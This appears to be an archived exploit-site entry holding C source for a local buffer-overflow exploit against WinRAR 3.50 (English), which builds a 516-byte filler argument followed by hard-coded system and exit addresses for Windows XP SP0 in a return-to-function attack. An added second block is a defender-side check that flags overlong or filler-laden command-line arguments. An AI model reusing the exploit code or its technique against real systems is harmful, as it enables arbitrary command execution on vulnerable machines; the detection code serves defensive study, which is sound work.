winrar-3.50-eng.txt

๐Ÿ—“๏ธย 18 Oct 2005ย 00:00:00Reported byย edward11Typeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstormsecurity.com๐Ÿ‘ย 25ย Views

Local exploit for WinRAR versions up to 3.50 using the ret-2-func technique.


Code
```c
/*

local exploit for winrar <= 3.50 ENG version


bug is 0day :)

I used the ret-2-func technique.

*/

#include <stdio.h>
#include <stdlib.h>   /* exit(), system() */
#include <string.h>
#include <windows.h>

int main ( int argc, char *argv[] )
{
    /* Hard-coded addresses: valid only for the target the author names. */
    long sys_addr = 0x77C18044; // winxp sp0 targets...
    long exit_addr = 0x77C27ADC;
    long cmd_addr = 0x77C01335;

    char buf[3000];
    char cmd[3000];

    if ( argc < 2 )
    {
        printf("\n * 0xLeTzDanCe - WinRAR <= 3.50 local exploit ENG version *\n * * usage: 0xletzdance.exe <path_to_RAR>\n\n");
        exit(0);
    }

    memset(buf, 0x00, 3000);
    memset(cmd, 0x00, 3000);

    /* 516 filler bytes, then the three addresses appended back to back. */
    memset(buf, 0x55, 516);

    *(long*)&buf[strlen(buf)] = sys_addr;
    *(long *)&buf[strlen(buf)] = exit_addr;
    *(long *)&buf[strlen(buf)] = cmd_addr;

    /* The buffer is passed to the WinRAR binary as a command-line argument. */
    sprintf(cmd, "%s %s", argv[1], buf);
    system(cmd);

    return 0;
}
```
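A defender-side triage check for the argument shape the listing above passes on the command line (516 filler bytes followed by three 4-byte values), suitable for running over arguments taken from process-creation logs. It is an added example, not part of the original Packet Storm file; the thresholds, flag names, function names and the 0xAA placeholder bytes in the constructed sample are assumptions.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define MAX_ARG_LEN 259  /* assumption: MAX_PATH (260) minus the terminator */
#define MAX_RUN      64  /* assumption: longest plausible run of one repeated byte */

enum { ARG_OK = 0, ARG_TOO_LONG = 1, ARG_NON_PRINTABLE = 2, ARG_FILLER_RUN = 4 };

/* Return a bitmask of reasons one command-line argument deserves a closer look.
 * These are triage signals, not verdicts: localized file names can legitimately
 * contain bytes outside printable ASCII. */
int audit_arg(const unsigned char *arg, size_t len)
{
    int flags = ARG_OK;
    size_t run = 1;

    if (len > MAX_ARG_LEN)
        flags |= ARG_TOO_LONG;
    for (size_t i = 0; i < len; i++) {
        if (arg[i] < 0x20 || arg[i] > 0x7e)
            flags |= ARG_NON_PRINTABLE;
        run = (i > 0 && arg[i] == arg[i - 1]) ? run + 1 : 1;
        if (run > MAX_RUN)
            flags |= ARG_FILLER_RUN;
    }
    return flags;
}

/* Constructed sample with the same shape as the argument built above:
 * 516 bytes of 0x55 plus 12 placeholder bytes standing in for the addresses. */
size_t build_constructed_sample(unsigned char *out, size_t cap)
{
    if (cap < 528)
        return 0;
    memset(out, 0x55, 516);
    memset(out + 516, 0xAA, 12);
    return 528;
}

int main(void)
{
    unsigned char sample[600];
    size_t n = build_constructed_sample(sample, sizeof sample);
    const char *benign = "C:\\docs\\report.rar";  /* constructed benign argument */

    printf("sample flags: %d\n", audit_arg(sample, n));
    printf("benign flags: %d\n", audit_arg((const unsigned char *)benign, strlen(benign)));
    return 0;
}
```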
